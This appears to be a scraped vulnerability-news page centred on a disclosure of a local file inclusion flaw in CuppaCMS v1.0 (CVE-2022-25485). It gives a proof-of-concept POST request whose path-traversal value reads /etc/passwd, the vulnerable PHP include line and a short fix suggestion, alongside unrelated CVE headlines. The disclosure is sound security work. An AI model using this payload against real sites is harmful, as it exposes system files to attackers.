CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.

Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa\_cms.zip

**poc**

    POST /alerts/alertLightbox.php 
    url=../../../../../../../../../../../etc/passwd
    

![image](https://user-images.githubusercontent.com/38547290/154226358-354ef363-b211-483a-9863-2ede994fb79d.png)

**analysis**

location:alerts/alertLightbox.php line 113  
![image](https://user-images.githubusercontent.com/38547290/154226643-bc455f45-c292-41c8-bbf7-5ec23147c88e.png)  
`<?php include $cuppa->getDocumentPath().@$cuppa->POST("url");`  
and $cuppa->POST

           // post
        public function POST($string){
                    return $this->sanitizeString(@$_POST[$string]);
           }
    

go on

          public function sanitizeString($string){
                    return htmlspecialchars(trim(@$string));
                }
    

so the post url without any lfi protected filter

**Repair suggestions**

you can check url ,for example check if it has .. then refuse this request

CVE-2022-25485: Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in /alerts/alertLightbox.php · Issue #24 · CuppaCMS/CuppaCMS

Headline

CVE-2022-25485: Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in /alerts/alertLightbox.php · Issue #24 · CuppaCMS/CuppaCMS

CVE: Latest News